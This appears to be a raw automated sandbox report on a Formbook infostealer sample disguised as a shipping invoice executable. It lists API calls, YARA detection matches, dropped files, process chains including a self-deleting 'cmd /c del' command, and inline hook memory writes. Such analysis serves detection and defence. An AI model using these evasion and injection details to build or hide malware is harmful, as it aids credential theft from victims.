Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_037499A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_037496E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_037496D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_037495D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_0374A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749A20 NtResumeThread,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749A10 NtQuerySection,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_03749950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_037499D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 9_2_0374B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749560 NtWriteFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F782B0 NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F78230 NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F78180 NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F782DA NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F782AC NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7817A NtCreateFile,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00406943
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_0040711A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10001BB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10004700
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10006325
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00401030
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041CB17
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041CB1A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B466
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00408C2B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00408C30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402D87
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B30D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C01D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B56E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4B090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B54120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6EBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037ACB4F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D2B28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B23E3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C03DA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373ABD8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CDBD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373EBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373138B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BFA2B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D22AE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370F900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037DE824
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D28EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D20A8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D1FF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037DDFCE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03726E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CD616
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D2EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D1D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03700D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D2D07
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371D5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D25DD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CD466
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371841F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7CB17
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7CB1A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F62FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B466
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F68C30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F68C2B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F62D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F62D87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0370B150 appears 136 times
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DevCfgUI.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: DevCfgUI.dll.0.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dll
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/27@11/6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_100019C0 Cremaster,CertOpenSystemStoreA,EqualSid,FlushFileBuffers,GetWindowThreadProcessId,ReleaseSemaphore,LoadBitmapA,ScrollDC,SetScrollPos,HeapDestroy,ReadFile,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Roaming\pkgs
          Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_01
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Local\Temp\nse53A6.tmp
          Source: Shipping INVOICE-BL Shipment..exe  Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe  File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe  File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
          Source: Shipping INVOICE-BL Shipment..exeVirustotal: Detection: 27%
          Source: Shipping INVOICE-BL Shipment..exeReversingLabs: Detection: 44%
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File read: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
          Source: unknownProcess created: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe 'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: vjscsvr.pdb source: nse53A7.tmp.0.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\rcxdtiui.pdb source: rcxditui.dll.0.dr
          Source: Binary string: netsh.pdb source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
          Source: Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb$ source: MSBuildFramework.dll.0.dr
          Source: Binary string: netsh.pdbGCTL source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, netsh.exe, 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: cmd.exe, netsh.exe
          Source: Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb source: MSBuildFramework.dll.0.dr
          Source: Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdbQ" source: nse53A7.tmp.0.dr
          Source: Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\dbsvcui.pdb source: nse53A7.tmp.0.dr
          Source: Binary string: cmd.pdb source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
          Source: Binary string: MakeCert.pdb source: makecert.exe.0.dr
          Source: Binary string: guidgen.pdb source: guidgen.exe.0.dr
          Source: Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdb source: nse53A7.tmp.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_1000734B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_100046E5 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041C952 push es; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B375 push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B3C2 push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B3CB push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00409412 push ss; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B42C push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00414D93 push 5C0B9774h; iretd
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00414EE9 push ebp; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B8D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0375D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B3C2 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B3CB push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B375 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7C952 push es; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F74EE9 push ebp; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B42C push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F69412 push ss; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F74D93 push 5C0B9774h; iretd
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Local\Temp\Prehnite.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe  File created: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe

          Hooking and other Techniques for Hiding and Protection:

          Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 77165050 value: E9 EB 61 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 771650F0 value: E9 5B 61 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 77165180 value: E9 9B 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 77165190 value: E9 CB 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 771651A0 value: E9 4B 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 7717FEE0 value: E9 9B FF FF FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 771133C0 value: E9 FB 6F 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 77114760 value: E9 2B 6B 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 770D6590 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 770DB510 value: E9 2B 53 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 770FC490 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 7711EE00 value: E9 E1 52 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 7711EFD0 value: E9 26 5B 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165050 value: E9 EB 61 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771650F0 value: E9 5B 61 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165180 value: E9 9B 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165190 value: E9 CB 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771651A0 value: E9 4B 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7717FEE0 value: E9 9B FF FF FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771133C0 value: E9 FB 6F 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77114760 value: E9 2B 6B 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770D6590 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770DB510 value: E9 2B 53 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770FC490 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7711EE00 value: E9 E1 52 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7711EFD0 value: E9 26 5B 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 77165050 value: E9 EB 61 FB FF
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 771650F0 value: E9 5B 61 FB FF
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 77165180 value: E9 9B 60 FB FF
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 77165190 value: E9 CB 60 FB FF
